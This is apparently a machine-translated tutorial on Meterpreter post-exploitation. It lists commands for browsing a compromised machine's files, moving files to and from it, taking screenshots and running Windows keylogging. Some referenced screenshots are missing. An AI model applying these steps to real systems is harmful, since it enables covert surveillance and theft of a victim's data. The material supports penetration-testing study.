After obtaining the remote control right of the target machine through Trojan horses or vulnerabilities, the next step is the post-infiltration process. Meterpreter can be regarded as an advanced backdoor tool that supports multiple operating platforms, which can realize privilege escalation, information capture, system monitoring, springboard attacks and Intranet expansion and other diverse functional features.
1. Access the file system
There are the following common instructions for accessing the file system: It can be seen that if the operation is performed on the attack aircraft, most operations are performed on the target aircraft, and there is one more l, which is roughly the same as the instructions under linux.
cat | read file content
cd | switch target machine directory
cp | copy files to target
mv | move to target
chmod | Modify file permissions (such as chmod 777 shell.elf)
del / rm | delete target file
dir/ls | print target directory
mkdir | Create a directory on the target machine
rmdir | Delete target machine directory
edit | edit file
getlwd | print local directory (what is the current path)
getwd | print target directory
lcd | change local directory
lls | list local directories
lpwd | print local directory
pwd | print working directory
search | search file details search -h
2. Upload and download files
After entering the directory where the file needs to be uploaded through cd, find the file to be uploaded in the attacking machine through lcd, and then upload the file to the target location through upload + file path. Download the file in the same way as download + file.
First use ls to view the target machine directory, make sure to put it in this directory
Use lls and lcd to find the files that need to be uploaded, and then upload:
Check the corresponding file again:
3. Screenshots
screenshot | command is enough.
4. Keylogging
keyscan_start | Start keylogger (Windows) |
keyscan_dump | Export Keyboard (Windows) |
keyscan_stop | Stop keylogging (Windows) |
Start to record from start, stop to stop, and dump is the record from start to dump.